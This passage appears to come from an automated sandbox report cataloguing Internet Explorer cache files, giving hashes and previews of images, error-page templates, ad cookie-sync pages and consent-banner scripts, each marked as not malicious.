                                        SHA-256:A1F6D07C79B387A99C2550B0E24AD030964EB42ACBA18F21F2D790A05499BAF3
                                        SHA-512:E8CD4F90716E62E4A0A8B9817794F55517CA52EC75F634E55462BBFDFB288076C1992298DB5578C84EC695D3B23BE6FF1AD80EDEEBA8435AAF96B6B32C711C5D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................a....pHYs..........+......IDATx.]SKO.Q...s;e:.}.}@.._....hb..b..kw........M\..t.0j....|"..E.2..C...S..M...s..;.~W..<.....=>......J.P..?.L........Pf.eB.BU...@.^"1(..05.]UA0....g..N.....H.K.L..P..z....;N..O.pi<...{oVpc*.[..D...@6.a,2....<..sq.h.h~.s.*..I.@L.....h8......)$.4.B.*.....3...m.&..H.....1...8.7...0...u..k.)d..\.;@...:m..*.Tc.....$.v..a..v.x.(;{..G...+...QY..L.N....;E......T..>@r(.;''d...0...../.nT.01...P!...5...P.....`...b.Q....k6.*..l....R.....P.Pw.t;..T.R...6[...\.l.7'Gpq$...[.Z.%....jb..`e..T.X...C.Y#.W..\.....B.B..mR...p.0.?.J..[.....K...Sl....."B.b.A...@.-..w.`E*.-.w..@<(,Ki.^O...zY^.. 7..4E.oyN..e..'.j.4...4ST .?.D.G....(...C..<.....8E...<?......../..X^c..j....IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\NewErrorPageTemplate[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):3224
                                        Entropy (8bit):4.869554560514657
                                        Encrypted:false
                                        SSDEEP:48:5m73jcJqQep89TEw7UxkZCm73jcJqQep89TEw7Uxkk:5nqrehEw7U6ZCnqrehEw7U6k
                                        MD5:3A35614D9A6156057F7D30C91C1ED4F2
                                        SHA1:7DDE5D14A15F465C9BFD0B0C0B3416175E69D1BC
                                        SHA-256:D544FAC44B7B2CD937726C401B5C9C726F900CEF22980A7B39F8756581901B73
                                        SHA-512:8A31C0C90EF443E3B7AC5B930466CD8CEF1D540D2D436A7DC4D12F38686368303882A9610A57B2A1CF9AB973DB684FDA0B1831B116EAEB4D86BE816FDD627C28
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\cfdbd9[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):740
                                        Entropy (8bit):7.552939906140702
                                        Encrypted:false
                                        SSDEEP:12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
                                        MD5:FE5E6684967766FF6A8AC57500502910
                                        SHA1:3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
                                        SHA-256:3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
                                        SHA-512:AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................U....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.*V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..*x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\checksync[2].htm
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, ASCII text, with very long lines
                                        Category:dropped
                                        Size (bytes):21628
                                        Entropy (8bit):5.304819777739522
                                        Encrypted:false
                                        SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                        MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                        SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                        SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                        SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":80,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\checksync[3].htm
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, ASCII text, with very long lines
                                        Category:dropped
                                        Size (bytes):21628
                                        Entropy (8bit):5.304819777739522
                                        Encrypted:false
                                        SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                        MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                        SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                        SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                        SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":80,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\checksync[4].htm
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, ASCII text, with very long lines
                                        Category:dropped
                                        Size (bytes):21628
                                        Entropy (8bit):5.304819777739522
                                        Encrypted:false
                                        SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                        MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                        SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                        SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                        SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":80,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\de-ch[2].json
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                        Category:dropped
                                        Size (bytes):79097
                                        Entropy (8bit):5.337866393801766
                                        Encrypted:false
                                        SSDEEP:768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCgP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlDxHga7B
                                        MD5:408DDD452219F77E388108945DE7D0FE
                                        SHA1:C34BAE1E2EBD5867CB735A5C9573E08C4787E8E7
                                        SHA-256:197C124AD4B7DD42D6628B9BEFD54226CCDCD631ECFAEE6FB857195835F3B385
                                        SHA-512:17B4CF649A4EAE86A6A38ABA535CAF0AEFB318D06765729053FDE4CD2EFEE7C13097286D0B8595435D0EB62EF09182A9A10CFEE2E71B72B74A6566A2697EAB1B
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: {"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\dnserror[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2997
                                        Entropy (8bit):4.4885437940628465
                                        Encrypted:false
                                        SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                        MD5:2DC61EB461DA1436F5D22BCE51425660
                                        SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                        SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                        SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\down[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):748
                                        Entropy (8bit):7.249606135668305
                                        Encrypted:false
                                        SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                        MD5:C4F558C4C8B56858F15C09037CD6625A
                                        SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                        SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                        SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\httpErrorPagesScripts[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):12105
                                        Entropy (8bit):5.451485481468043
                                        Encrypted:false
                                        SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                        MD5:9234071287E637F85D721463C488704C
                                        SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                        SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                        SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\iab2Data[1].json
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                        Category:dropped
                                        Size (bytes):242382
                                        Entropy (8bit):5.1486574437549235
                                        Encrypted:false
                                        SSDEEP:768:l3JqIW6A3pZcOkv+prD5bxLkjO68KQHamIT4Ff5+wbUk6syZ7TMwz:l3JqINA3kR4D5bxLk78KsIkfZ6hBz
                                        MD5:D76FFE379391B1C7EE0773A842843B7E
                                        SHA1:772ED93B31A368AE8548D22E72DDE24BB6E3855C
                                        SHA-256:D0EB78606C49FCD41E2032EC6CC6A985041587AAEE3AE15B6D3B693A924F08F2
                                        SHA-512:23E7888E069D05812710BF56CC76805A4E836B88F7493EC6F669F72A55D5D85AD86AD608650E708FA1861BC78A139616322D34962FD6BE0D64E0BEA0107BF4F4
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: {"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\location[1].js
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):182
                                        Entropy (8bit):4.685293041881485
                                        Encrypted:false
                                        SSDEEP:3:LUfGC48HlHJ2R4OE9HQnpK9fQ8I5CMnRMRU8x4RiiP22/90+apWyRHfHO:nCf4R5ElWpKWjvRMmhLP2saVO
                                        MD5:C4F67A4EFC37372559CD375AA74454A3
                                        SHA1:2B7303240D7CBEF2B7B9F3D22D306CC04CBFBE56
                                        SHA-256:C72856B40493B0C4A9FC25F80A10DFBF268B23B30A07D18AF4783017F54165DE
                                        SHA-512:1EE4D2C1ED8044128DCDCDB97DC8680886AD0EC06C856F2449B67A6B0B9D7DE0A5EA2BBA54EB405AB129DD0247E605B68DC11CEB6A074E6CF088A73948AF2481
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\otBannerSdk[1].js
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):374818
                                        Entropy (8bit):5.338137698375348
                                        Encrypted:false
                                        SSDEEP:3072:axBt4stoUf3MiPnDxOFvxYyTcwY+OiHeNUQW2SzDZTpl1L:NUfbPnDxOFvxYyY+Oi+yQW2CDZTn1L
                                        MD5:2E5F92E8C8983AA13AA99F443965BB7D
                                        SHA1:D80209C734F458ABA811737C49E0A1EAF75F9BCA
                                        SHA-256:11D9CC951D602A168BD260809B0FA200D645409B6250BD8E8996882EBE3F5A9D
                                        SHA-512:A699BEC040B1089286F9F258343E012EC2466877CC3C9D3DFEF9D00591C88F976B44D9795E243C7804B62FDC431267E1117C2D42D4B73B7E879AEFB1256C644B
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: /** .. * onetrust-banner-sdk.. * v6.13.0.. * by OneTrust LLC.. * Copyright 2021 .. */..!function(){"use strict";var o=function(e,t){return(o=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var o in t)t.hasOwnProperty(o)&&(e[o]=t[o])})(e,t)};var r=function(){return(r=Object.assign||function(e){for(var t,o=1,n=arguments.length;o<n;o++)for(var r in t=arguments[o])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};function a(s,i,l,a){return new(l=l||Promise)(function(e,t){function o(e){try{r(a.next(e))}catch(e){t(e)}}function n(e){try{r(a.throw(e))}catch(e){t(e)}}function r(t){t.done?e(t.value):new l(function(e){e(t.value)}).then(o,n)}r((a=a.apply(s,i||[])).next())})}function d(o,n){var r,s,i,e,l={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return e={next:t(0),throw:t(1),return:t(2)},"function"==typeof Symbol&&(e[Symbol.iterator]=function(){return this}),e;function t(t
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\otTCF-ie[2].js
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):102879
                                        Entropy (8bit):5.311489377663803
                                        Encrypted:false
                                        SSDEEP:768:ONkWT0m7r8N1qpPVsjvB6z4Yj3RCjnugKtLEdT8xJORONTMC5GkkJ0XcJGk58:8kunecpuj5QRCjnrKxJg0TMC5ZW8
                                        MD5:52F29FAC6C1D2B0BAC8FE5D0AA2F7A15
                                        SHA1:D66C777DA4B6D1FEE86180B2B45A3954AE7E0AED
                                        SHA-256:E497A9E7A9620236A9A67F77D2CDA1CC9615F508A392ECCA53F63D2C8283DC0E
                                        SHA-512:DF33C49B063AEFD719B47F9335A4A7CE38FA391B2ADF5ACFD0C3FE891A5D0ADDF1C3295E6FF44EE08E729F96E0D526FFD773DC272E57C3B247696B79EE1168BA
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: !function(){"use strict";var c="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function e(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function t(e,t){return e(t={exports:{}},t.exports),t.exports}function n(e){return e&&e.Math==Math&&e}function p(e){try{return!!e()}catch(e){return!0}}function E(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}function o(e){return w.call(e).slice(8,-1)}function u(e){if(null==e)throw TypeError("Can't call method on "+e);return e}function l(e){return I(u(e))}function f(e){return"object"==typeof e?null!==e:"function"==typeof e}function i(e,t){if(!f(e))return e;var n,r;if(t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;if("function"==typeof(n=e.valueOf)&&!f(r=n.call(e)))return r;if(!t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;throw TypeError("Can't convert object to primitive value")}function y(e,t){retur
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AANf6qa[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):432
                                        Entropy (8bit):7.252548911424453
                                        Encrypted:false
                                        SSDEEP:6:6v/lhPahm7saDdLbPvjAEQhnZxqQ7FULH4hYHgjtoYFWYooCUQVHyXRTTrYm/RTy:6v/79Zb8FZxqQJ4Yhro0Lsm96d
                                        MD5:7ED73D785784B44CF3BD897AB475E5CF
                                        SHA1:47A753F5550D727F2FB5535AD77F5042E5F6D954
                                        SHA-256:EEEA2FBC7695452F186059EC6668A2C8AE469975EBBAF5140B8AC40F642AC466
                                        SHA-512:FAF9E3AF38796B906F198712772ACBF361820367BDC550076D6D89C2F474082CC79725EC81CECF661FA9EFF3316EE10853C75594D5022319EAE9D078802D9C77
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................a....pHYs..........+.....bIDATx..?..a..?.3.w`.x.&..d..Q.L..LJ^.o...,....DR,.$.O.....r.ws..<.<.|..|..x..?....^..j..r...F..v<.........t.d2.^...x<b6....\.WT...L".`8.R......m.N'..`0H.T..vc...@.H$..+..~..j....N.....~.O.Z%..+..T*.r...#.....F2..X,.Z.h4..R)z..6.s:...l2...l....N>...dB6.%..i...)....q...^..n.K&..^..X,>'..dT)..v:.0D.Q.y>.#.u:.,...Z..r..../h..u....#'.v........._&^....~..ol.#....IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOfJsZ[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                        Category:dropped
                                        Size (bytes):2490
                                        Entropy (8bit):7.830846007357338
                                        Encrypted:false
                                        SSDEEP:48:QfAuETASNLIt+OSmfUyYuQ8tUnAGtl2hZZL1zG4tTCJ:Qf7EpIyyUyfntUnAOlW1zGIy
                                        MD5:6FA342BB2DAD0272A38CCF9D8B599264
                                        SHA1:65FEE20BEB7A5735412D9759B2E5FA1CAECA27A1
                                        SHA-256:74C1C1A5A96916E147002ECA860D303A57942161D3D7F9F2AAAA6A1CF4EB30E2
                                        SHA-512:2CA505CD6D2B18A510785187B69BED0F3A7050EC15D157AEF187901E1FE149AFFD8A6CF67C1BA628A323CA4252F4D723A4E29D3D5C5BBDF8C06816A78477C39B
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.. ..k..7.9_. [. ...0.P....M..'....V..2.. =I...nm../.m.&.SQ0..q.....Y{w}.^...N.5/.,.:.....U...H.U.!..!.D..A.}*[."5D.....Mq.7..k.;....J...f.....8.iV(.....m%v5..A...c..l.nn...W.....\N|.C.....x^.....#.j|.e..2.5....K...V..FV....Z...1..*....9]..Vfi.3.b....&4Fj.=:d1....7fm-Q....7.t.#6..[....s.,.}.O..e..N....d.m..].ls.L}.:.I)3.0..M.>..F.&.b?.A......1...]NjQ....k..{x..}...h...
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOfsCY[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:dropped
                                        Size (bytes):30752
                                        Entropy (8bit):7.906234754194529
                                        Encrypted:false
